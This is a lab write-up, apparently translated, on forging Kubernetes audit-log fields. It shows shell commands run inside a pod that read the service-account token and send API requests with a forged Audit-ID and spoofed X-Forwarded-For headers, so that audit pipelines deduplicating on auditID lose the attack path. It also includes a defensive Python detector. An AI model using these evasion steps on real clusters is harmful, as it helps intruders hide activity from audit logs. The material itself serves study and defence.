Environment setup
The lab cluster is created with kind. audit_policy.yaml must be placed on the host in /root/k8s_audit/ (the kind config below mounts that directory into the node as /auditing). Its contents are the example policy from the Kubernetes auditing docs:
apiVersion: audit.k8s.io/v1 # This is required.
kind: Policy
# Don't generate audit events for all requests in RequestReceived stage.
omitStages:
  - "RequestReceived"
rules:
  # Log pod changes at RequestResponse level
  - level: RequestResponse
    resources:
    - group: ""
      # Resource "pods" doesn't match requests to any subresource of pods,
      # which is consistent with the RBAC policy.
      resources: ["pods"]
  # Log "pods/log", "pods/status" at Metadata level
  - level: Metadata
    resources:
    - group: ""
      resources: ["pods/log", "pods/status"]

  # Don't log requests to a configmap called "controller-leader"
  - level: None
    resources:
    - group: ""
      resources: ["configmaps"]
      resourceNames: ["controller-leader"]

  # Don't log watch requests by the "system:kube-proxy" on endpoints or services
  - level: None
    users: ["system:kube-proxy"]
    verbs: ["watch"]
    resources:
    - group: "" # core API group
      resources: ["endpoints", "services"]

  # Don't log authenticated requests to certain non-resource URL paths.
  - level: None
    userGroups: ["system:authenticated"]
    nonResourceURLs:
    - "/api*" # Wildcard matching.
    - "/version"

  # Log the request body of configmap changes in kube-system.
  - level: Request
    resources:
    - group: "" # core API group
      resources: ["configmaps"]
    # This rule only applies to resources in the "kube-system" namespace.
    # The empty string "" can be used to select non-namespaced resources.
    namespaces: ["kube-system"]

  # Log configmap and secret changes in all other namespaces at the Metadata level.
  - level: Metadata
    resources:
    - group: "" # core API group
      resources: ["secrets", "configmaps"]

  # Log all other resources in core and extensions at the Request level.
  - level: Request
    resources:
    - group: "" # core API group
    - group: "extensions" # Version of group should NOT be included.

  # A catch-all rule to log all other requests at the Metadata level.
  - level: Metadata
    # Long-running requests like watches that fall under this rule will not
    # generate an audit event in RequestReceived.
    omitStages:
      - "RequestReceived"
Run the following commands on the host to create the cluster. The kubeadm patch passes --audit-policy-file and --audit-log-path to kube-apiserver through extraArgs, and the host directory /root/k8s_audit/ is mounted into the node as /auditing, so the policy is read from and the log is written to that directory:
docker pull kindest/node:v1.27.1
kind create cluster --config - --image kindest/node:v1.27.1 <<EOF
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    apiVersion: kubeadm.k8s.io/v1beta3
    kind: ClusterConfiguration
    metadata:
      name: config
    apiServer:
      extraArgs:
        audit-policy-file: "/auditing/audit_policy.yaml"
        audit-log-path: "/auditing/audit.log"
      extraVolumes:
      - name: "auditing"
        hostPath: "/auditing"
        mountPath: "/auditing"
        readOnly: false
        pathType: "Directory"
  extraMounts:
  - hostPath: /root/k8s_audit/
    containerPath: /auditing
    propagation: None
EOF
Once the cluster is up, the audit log is visible inside the node at /auditing/audit.log (and on the host at /root/k8s_audit/audit.log), one JSON event per line.
Create a Pod to attack from. The alpine image must exist locally before kind can load it into the node:
docker pull alpine:latest
kind load docker-image --name kind alpine:latest
kubectl run test-pod --image=docker.io/library/alpine:latest --restart=Always --image-pull-policy=IfNotPresent --command -- /bin/sh -c "while true; do sleep 3600; done"
Forging the Audit ID
The Audit ID can be chosen by the client, so it cannot be trusted. The apiserver's audit filter takes the value of the request's Audit-ID header as the event's auditID and only generates a fresh UUID when the header is absent; it also echoes the ID back in the response's Audit-ID header. Inside the cluster this is mostly harmless, but if an external system aggregates or deduplicates audit events by Audit ID, an attacker can reuse one Audit ID to hide malicious actions and the attack path behind them. Details: https://github.com/kubernetes/kubernetes/issues/101597
Enter test-pod (kubectl exec -it test-pod -- /bin/sh) and run:
sed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositories   # optional: use a faster apk mirror
apk add curl
env | grep KUBERNETES_SERVICE_HOST   # confirm the API server address (10.96.0.1 in a default kind cluster)
export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -s -k -H "Audit-ID: 11111111-aeff-4d18-8add-fec2289ef296" -H "Authorization: Bearer $TOKEN" https://10.96.0.1:443/api/v1/pods/
Check the audit log on the node: the event for this request carries the forged Audit ID. Whether the request is authorized or not makes no difference (the default service account is normally denied with a 403), since the event is written with the client-supplied auditID either way.
As long as the attacker uses the same Audit-ID throughout the attack and makes sure the first or last request under that ID is harmless, an external system that aggregates or deduplicates audit events by Audit ID can no longer reconstruct the attack path. The apiserver's own audit.log still contains every event, so the defence is on the consuming side: never treat auditID as a unique key, and deduplicate on the full request identity (user, verb, requestURI, timestamps) instead.
https://github.com/kubernetes/kubernetes/blob/622509830c1038535e539f7d364f5cd7c3b38791/staging/src/k8s.io/apiserver/pkg/apis/audit/types.go#L29
Forging the source IP
Both X-Forwarded-For and X-Real-IP can be forged. The sourceIPs field of an audit event is built in order from the X-Forwarded-For header IPs, then X-Real-IP if it is not already in that list, then the connection's remote address if it differs from the last entry so far; everything except the last entry is client-controlled. Forging the headers therefore prepends a fake IP rather than replacing the real one, so when analysing the log only the last entry of sourceIPs should be treated as authoritative (or, if kube-apiserver sits behind a trusted proxy, only what that proxy appends):
export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -s -k -H "X-Forwarded-For: 10.96.0.1" -H "Audit-ID: 11111111-aeff-4d18-8add-fec2289ef296" -H "Authorization: Bearer $TOKEN" https://10.96.0.1:443/api/v1/pods/
https://github.com/kubernetes/kubernetes/blob/622509830c1038535e539f7d364f5cd7c3b38791/staging/src/k8s.io/apiserver/pkg/apis/audit/types.go#L108
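The defender's side of both tricks above, as an added example that is not code from the original post, from raesene/k8s_audit or from Kubernetes: a Python script that reads the JSON-lines audit.log produced by the policy above and (1) finds Audit-IDs that cover more than one distinct request while tolerating the legitimate case of several stages of one request sharing an ID, (2) shows which requests a pipeline that deduplicates on auditID would lose, and (3) separates the header-supplied entries of sourceIPs from the real remote address. The six sample events are constructed; only the forged Audit-ID is the one from the curl commands above, and the user names, paths, IP addresses and status codes are assumptions.

```python
"""Check a kube-apiserver audit log for reused Audit-IDs and header-injected source IPs.

Added example, not code from the original post, from raesene/k8s_audit or from
Kubernetes itself. Input is the JSON-lines audit.log that the policy above makes
kube-apiserver write (audit.k8s.io/v1 Event objects, one per line).
"""
import json
from collections import defaultdict

# The forged ID is the one sent in the curl commands above; everything else in
# the sample events (users, paths, IPs, status codes) is a constructed assumption.
FORGED_ID = "11111111-aeff-4d18-8add-fec2289ef296"
SA_USER = "system:serviceaccount:default:default"
ADMIN = "kubernetes-admin"

def _event(audit_id, stage, verb, uri, user, source_ips, code):
    """Build a trimmed audit.k8s.io/v1 Event with just the fields the checks use."""
    return {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "Metadata",
            "auditID": audit_id, "stage": stage, "verb": verb, "requestURI": uri,
            "user": {"username": user}, "sourceIPs": source_ips,
            "responseStatus": {"code": code}}

SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    # harmless opener carrying the forged ID (pod listing, denied by RBAC)
    _event(FORGED_ID, "ResponseComplete", "list", "/api/v1/pods/", SA_USER,
           ["10.244.0.5"], 403),
    # the real attack steps reuse the same ID and prepend 10.96.0.1 via X-Forwarded-For
    _event(FORGED_ID, "ResponseComplete", "list",
           "/api/v1/namespaces/kube-system/secrets", SA_USER,
           ["10.96.0.1", "10.244.0.5"], 200),
    _event(FORGED_ID, "ResponseComplete", "create",
           "/api/v1/namespaces/default/pods", SA_USER,
           ["10.96.0.1", "10.244.0.5"], 201),
    # unrelated request with a server-generated ID
    _event("6f1c9d2e-0a3b-4c5d-8e7f-112233445566", "ResponseComplete", "get",
           "/api/v1/nodes", ADMIN, ["172.18.0.1"], 200),
    # one long-running watch logged at two stages: same ID, same request, legitimate
    _event("0b2a7c41-9d8e-4f60-a1b2-c3d4e5f60718", "ResponseStarted", "watch",
           "/api/v1/pods?watch=true", ADMIN, ["172.18.0.1"], 200),
    _event("0b2a7c41-9d8e-4f60-a1b2-c3d4e5f60718", "ResponseComplete", "watch",
           "/api/v1/pods?watch=true", ADMIN, ["172.18.0.1"], 200),
])

def parse_audit_log(text):
    """Parse JSON-lines audit output, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def request_key(event):
    """Identity of a request independent of its stage and of the client-chosen auditID."""
    return (event["user"]["username"], event["verb"], event["requestURI"])

def find_reused_audit_ids(events):
    """Audit-IDs that cover more than one distinct request.

    Several stages of one request legitimately share an ID, so the check keys
    on the request, not on how many events carry the ID.
    """
    requests_by_id = defaultdict(set)
    for e in events:
        requests_by_id[e["auditID"]].add(request_key(e))
    return {aid: sorted(keys) for aid, keys in requests_by_id.items() if len(keys) > 1}

def naive_dedup(events):
    """What a downstream collector does when it trusts auditID as unique: keep the first event per ID."""
    seen, kept = set(), []
    for e in events:
        if e["auditID"] not in seen:
            seen.add(e["auditID"])
            kept.append(e)
    return kept

def requests_hidden_by_dedup(events):
    """Requests that disappear completely once the log is deduplicated on auditID."""
    survivors = {request_key(e) for e in naive_dedup(events)}
    return {request_key(e) for e in events} - survivors

def trusted_source_ip(event):
    """The one sourceIPs entry the client cannot choose: the last, the connection's remote address.

    If a trusted proxy sits in front of kube-apiserver, the last entry is that
    proxy and the client address is whatever the proxy itself appended.
    """
    return event["sourceIPs"][-1]

def header_injected_ips(event):
    """Entries that came from X-Forwarded-For / X-Real-IP and may be forged."""
    return event["sourceIPs"][:-1]

if __name__ == "__main__":
    evs = parse_audit_log(SAMPLE_AUDIT_LOG)
    for aid, reqs in find_reused_audit_ids(evs).items():
        print(f"auditID {aid} reused across {len(reqs)} requests: {reqs}")
    print("requests a dedup-by-auditID pipeline would lose:", requests_hidden_by_dedup(evs))
    for e in evs:
        if header_injected_ips(e):
            print(f"{e['auditID']} {e['verb']} {e['requestURI']}: real source {trusted_source_ip(e)}, "
                  f"header-supplied {header_injected_ips(e)}")
```

To run it against a real cluster, replace SAMPLE_AUDIT_LOG with the contents of /root/k8s_audit/audit.log from the setup above. On the sample data the forged ID is reported as covering three distinct requests, the secrets listing and the pod creation are exactly the two requests a dedup-on-auditID pipeline drops, and the spoofed 10.96.0.1 is classified as header-supplied while 10.244.0.5 remains the real source.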
References
https://github.com/raesene/k8s_audit/
Originally published on the WeChat public account 安全小将李坦然: 伪造 Kubernetes 审计日志 (Forging Kubernetes Audit Logs)